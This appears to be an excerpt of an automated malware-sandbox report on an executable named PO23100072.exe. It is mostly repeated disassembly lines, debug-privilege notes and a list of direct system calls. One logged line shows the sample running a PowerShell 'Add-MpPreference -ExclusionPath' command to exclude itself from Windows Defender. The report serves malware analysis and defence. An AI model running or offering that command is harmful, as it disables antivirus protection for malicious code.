            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01874500 mov eax, dword ptr fs:[00000030h]5_2_01874500
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC5ED mov eax, dword ptr fs:[00000030h]5_2_017DC5ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC5ED mov eax, dword ptr fs:[00000030h]5_2_017DC5ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A25E0 mov eax, dword ptr fs:[00000030h]5_2_017A25E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE5E7 mov eax, dword ptr fs:[00000030h]5_2_017CE5E7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A65D0 mov eax, dword ptr fs:[00000030h]5_2_017A65D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA5D0 mov eax, dword ptr fs:[00000030h]5_2_017DA5D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA5D0 mov eax, dword ptr fs:[00000030h]5_2_017DA5D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE5CF mov eax, dword ptr fs:[00000030h]5_2_017DE5CF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE5CF mov eax, dword ptr fs:[00000030h]5_2_017DE5CF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C45B1 mov eax, dword ptr fs:[00000030h]5_2_017C45B1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C45B1 mov eax, dword ptr fs:[00000030h]5_2_017C45B1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE59C mov eax, dword ptr fs:[00000030h]5_2_017DE59C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D4588 mov eax, dword ptr fs:[00000030h]5_2_017D4588
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A2582 mov eax, dword ptr fs:[00000030h]5_2_017A2582
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A2582 mov ecx, dword ptr fs:[00000030h]5_2_017A2582
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CA470 mov eax, dword ptr fs:[00000030h]5_2_017CA470
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185A49A mov eax, dword ptr fs:[00000030h]5_2_0185A49A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179645D mov eax, dword ptr fs:[00000030h]5_2_0179645D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C245A mov eax, dword ptr fs:[00000030h]5_2_017C245A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182A4B0 mov eax, dword ptr fs:[00000030h]5_2_0182A4B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DE443 mov eax, dword ptr fs:[00000030h]5_2_017DE443
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA430 mov eax, dword ptr fs:[00000030h]5_2_017DA430
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179E420 mov eax, dword ptr fs:[00000030h]5_2_0179E420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0179C427 mov eax, dword ptr fs:[00000030h]5_2_0179C427
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8402 mov eax, dword ptr fs:[00000030h]5_2_017D8402
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A04E5 mov ecx, dword ptr fs:[00000030h]5_2_017A04E5
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01826420 mov eax, dword ptr fs:[00000030h]5_2_01826420
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D44B0 mov ecx, dword ptr fs:[00000030h]5_2_017D44B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A64AB mov eax, dword ptr fs:[00000030h]5_2_017A64AB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0185A456 mov eax, dword ptr fs:[00000030h]5_2_0185A456
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C460 mov ecx, dword ptr fs:[00000030h]5_2_0182C460
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A8770 mov eax, dword ptr fs:[00000030h]5_2_017A8770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184678E mov eax, dword ptr fs:[00000030h]5_2_0184678E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B0770 mov eax, dword ptr fs:[00000030h]5_2_017B0770
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018547A0 mov eax, dword ptr fs:[00000030h]5_2_018547A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0750 mov eax, dword ptr fs:[00000030h]5_2_017A0750
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2750 mov eax, dword ptr fs:[00000030h]5_2_017E2750
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2750 mov eax, dword ptr fs:[00000030h]5_2_017E2750
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D674D mov esi, dword ptr fs:[00000030h]5_2_017D674D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D674D mov eax, dword ptr fs:[00000030h]5_2_017D674D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D674D mov eax, dword ptr fs:[00000030h]5_2_017D674D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D273C mov eax, dword ptr fs:[00000030h]5_2_017D273C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D273C mov ecx, dword ptr fs:[00000030h]5_2_017D273C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D273C mov eax, dword ptr fs:[00000030h]5_2_017D273C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018207C3 mov eax, dword ptr fs:[00000030h]5_2_018207C3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC720 mov eax, dword ptr fs:[00000030h]5_2_017DC720
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC720 mov eax, dword ptr fs:[00000030h]5_2_017DC720
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E7E1 mov eax, dword ptr fs:[00000030h]5_2_0182E7E1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A0710 mov eax, dword ptr fs:[00000030h]5_2_017A0710
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D0710 mov eax, dword ptr fs:[00000030h]5_2_017D0710
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC700 mov eax, dword ptr fs:[00000030h]5_2_017DC700
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A47FB mov eax, dword ptr fs:[00000030h]5_2_017A47FB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A47FB mov eax, dword ptr fs:[00000030h]5_2_017A47FB
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C27ED mov eax, dword ptr fs:[00000030h]5_2_017C27ED
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181C730 mov eax, dword ptr fs:[00000030h]5_2_0181C730
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AC7C0 mov eax, dword ptr fs:[00000030h]5_2_017AC7C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A07AF mov eax, dword ptr fs:[00000030h]5_2_017A07AF
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01824755 mov eax, dword ptr fs:[00000030h]5_2_01824755
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E75D mov eax, dword ptr fs:[00000030h]5_2_0182E75D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D2674 mov eax, dword ptr fs:[00000030h]5_2_017D2674
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA660 mov eax, dword ptr fs:[00000030h]5_2_017DA660
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA660 mov eax, dword ptr fs:[00000030h]5_2_017DA660
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BC640 mov eax, dword ptr fs:[00000030h]5_2_017BC640
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A262C mov eax, dword ptr fs:[00000030h]5_2_017A262C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017BE627 mov eax, dword ptr fs:[00000030h]5_2_017BE627
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D6620 mov eax, dword ptr fs:[00000030h]5_2_017D6620
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D8620 mov eax, dword ptr fs:[00000030h]5_2_017D8620
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2619 mov eax, dword ptr fs:[00000030h]5_2_017E2619
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B260B mov eax, dword ptr fs:[00000030h]5_2_017B260B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E6F2 mov eax, dword ptr fs:[00000030h]5_2_0181E6F2
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018206F1 mov eax, dword ptr fs:[00000030h]5_2_018206F1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018206F1 mov eax, dword ptr fs:[00000030h]5_2_018206F1
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E609 mov eax, dword ptr fs:[00000030h]5_2_0181E609
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA6C7 mov ebx, dword ptr fs:[00000030h]5_2_017DA6C7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA6C7 mov eax, dword ptr fs:[00000030h]5_2_017DA6C7
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D66B0 mov eax, dword ptr fs:[00000030h]5_2_017D66B0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC6A6 mov eax, dword ptr fs:[00000030h]5_2_017DC6A6
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186866E mov eax, dword ptr fs:[00000030h]5_2_0186866E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186866E mov eax, dword ptr fs:[00000030h]5_2_0186866E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4690 mov eax, dword ptr fs:[00000030h]5_2_017A4690
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4690 mov eax, dword ptr fs:[00000030h]5_2_017A4690
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E096E mov eax, dword ptr fs:[00000030h]5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E096E mov edx, dword ptr fs:[00000030h]5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E096E mov eax, dword ptr fs:[00000030h]5_2_017E096E
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C6962 mov eax, dword ptr fs:[00000030h]5_2_017C6962
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018289B3 mov esi, dword ptr fs:[00000030h]5_2_018289B3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018289B3 mov eax, dword ptr fs:[00000030h]5_2_018289B3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018289B3 mov eax, dword ptr fs:[00000030h]5_2_018289B3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_018369C0 mov eax, dword ptr fs:[00000030h]5_2_018369C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186A9D3 mov eax, dword ptr fs:[00000030h]5_2_0186A9D3
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01798918 mov eax, dword ptr fs:[00000030h]5_2_01798918
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01798918 mov eax, dword ptr fs:[00000030h]5_2_01798918
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E9E0 mov eax, dword ptr fs:[00000030h]5_2_0182E9E0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D29F9 mov eax, dword ptr fs:[00000030h]5_2_017D29F9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D29F9 mov eax, dword ptr fs:[00000030h]5_2_017D29F9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E908 mov eax, dword ptr fs:[00000030h]5_2_0181E908
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0181E908 mov eax, dword ptr fs:[00000030h]5_2_0181E908
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C912 mov eax, dword ptr fs:[00000030h]5_2_0182C912
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182892A mov eax, dword ptr fs:[00000030h]5_2_0182892A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0183892B mov eax, dword ptr fs:[00000030h]5_2_0183892B
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017AA9D0 mov eax, dword ptr fs:[00000030h]5_2_017AA9D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D49D0 mov eax, dword ptr fs:[00000030h]5_2_017D49D0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01820946 mov eax, dword ptr fs:[00000030h]5_2_01820946
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A09AD mov eax, dword ptr fs:[00000030h]5_2_017A09AD
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A09AD mov eax, dword ptr fs:[00000030h]5_2_017A09AD
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B29A0 mov eax, dword ptr fs:[00000030h]5_2_017B29A0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01844978 mov eax, dword ptr fs:[00000030h]5_2_01844978
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01844978 mov eax, dword ptr fs:[00000030h]5_2_01844978
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C97C mov eax, dword ptr fs:[00000030h]5_2_0182C97C
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C89D mov eax, dword ptr fs:[00000030h]5_2_0182C89D
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4859 mov eax, dword ptr fs:[00000030h]5_2_017A4859
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017A4859 mov eax, dword ptr fs:[00000030h]5_2_017A4859
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017D0854 mov eax, dword ptr fs:[00000030h]5_2_017D0854
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017B2840 mov ecx, dword ptr fs:[00000030h]5_2_017B2840
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov ecx, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017C2835 mov eax, dword ptr fs:[00000030h]5_2_017C2835
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DA830 mov eax, dword ptr fs:[00000030h]5_2_017DA830
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0186A8E4 mov eax, dword ptr fs:[00000030h]5_2_0186A8E4
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC8F9 mov eax, dword ptr fs:[00000030h]5_2_017DC8F9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017DC8F9 mov eax, dword ptr fs:[00000030h]5_2_017DC8F9
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182C810 mov eax, dword ptr fs:[00000030h]5_2_0182C810
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017CE8C0 mov eax, dword ptr fs:[00000030h]5_2_017CE8C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184483A mov eax, dword ptr fs:[00000030h]5_2_0184483A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0184483A mov eax, dword ptr fs:[00000030h]5_2_0184483A
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E872 mov eax, dword ptr fs:[00000030h]5_2_0182E872
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0182E872 mov eax, dword ptr fs:[00000030h]5_2_0182E872
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_01836870 mov eax, dword ptr fs:[00000030h]5_2_01836870
            Source: C:\Users\user\Desktop\PO23100072.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\PO23100072.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\PO23100072.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                NtCreateMutant: Direct from: 0x774635CC
                NtWriteVirtualMemory: Direct from: 0x77462E3C
                NtMapViewOfSection: Direct from: 0x77462D1C
                NtResumeThread: Direct from: 0x774636AC
                NtProtectVirtualMemory: Direct from: 0x77462F9C
                NtSetInformationProcess: Direct from: 0x77462C5C
                NtSetInformationThread: Direct from: 0x774563F9
                NtNotifyChangeKey: Direct from: 0x77463C2C
                NtProtectVirtualMemory: Direct from: 0x77457B2E
                NtAllocateVirtualMemory: Direct from: 0x77462BFC
                NtQueryInformationProcess: Direct from: 0x77462C26
                NtResumeThread: Direct from: 0x77462FBC
                NtReadFile: Direct from: 0x77462ADC
                NtQuerySystemInformation: Direct from: 0x77462DFC
                NtDelayExecution: Direct from: 0x77462DDC
                NtAllocateVirtualMemory: Direct from: 0x77463C9C
                NtClose: Direct from: 0x77462B6C
                NtCreateUserProcess: Direct from: 0x7746371C
                NtWriteVirtualMemory: Direct from: 0x7746490C
                NtAllocateVirtualMemory: Direct from: 0x774648EC
                NtQuerySystemInformation: Direct from: 0x774648CC
                NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                NtReadVirtualMemory: Direct from: 0x77462E8C
                NtCreateKey: Direct from: 0x77462C6C
                NtSetInformationThread: Direct from: 0x77462B4C
                NtQueryAttributesFile: Direct from: 0x77462E6C
                NtDeviceIoControlFile: Direct from: 0x77462AEC
                NtOpenSection: Direct from: 0x77462E0C
                NtCreateFile: Direct from: 0x77462FEC
                NtOpenFile: Direct from: 0x77462DCC
                NtQueryInformationToken: Direct from: 0x77462CAC
